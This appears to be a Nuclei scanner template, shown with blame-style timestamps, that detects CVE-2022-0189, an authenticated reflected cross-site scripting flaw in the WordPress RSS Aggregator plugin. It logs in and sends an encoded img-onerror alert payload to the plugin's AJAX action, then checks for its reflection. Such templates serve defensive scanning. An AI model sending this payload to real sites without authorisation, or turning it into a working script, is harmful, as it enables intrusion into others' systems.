2022-03-27 14:25:03 +00:00
id : CVE-2022-0189
info :
2022-09-09 17:34:37 +00:00
name : WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting
2022-03-27 14:25:03 +00:00
author : DhiyaneshDK
severity : medium
2022-05-17 09:18:12 +00:00
description : WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.
2022-03-27 14:25:03 +00:00
reference :
- https://wpscan.com/vulnerability/52a71bf1-b8bc-479e-b741-eb8fb9685014
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0189
2022-05-17 09:18:12 +00:00
- https://plugins.trac.wordpress.org/changeset/2659298
2022-03-27 14:25:50 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-03-27 14:25:50 +00:00
cve-id : CVE-2022-0189
cwe-id : CWE-79
2023-07-15 16:29:17 +00:00
epss-score : 0.00112
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : wprssaggregator
product : wp_rss_aggregator
tags : wpscan,cve,cve2022,wordpress,xss,wp-plugin,authenticated
2022-03-27 14:25:03 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-03-27 14:25:03 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2022-03-27 14:25:03 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- "<img src onerror=alert(`document.domain`)>"
- type : word
part : header
words :
- text/html
- type : status
status :
- 200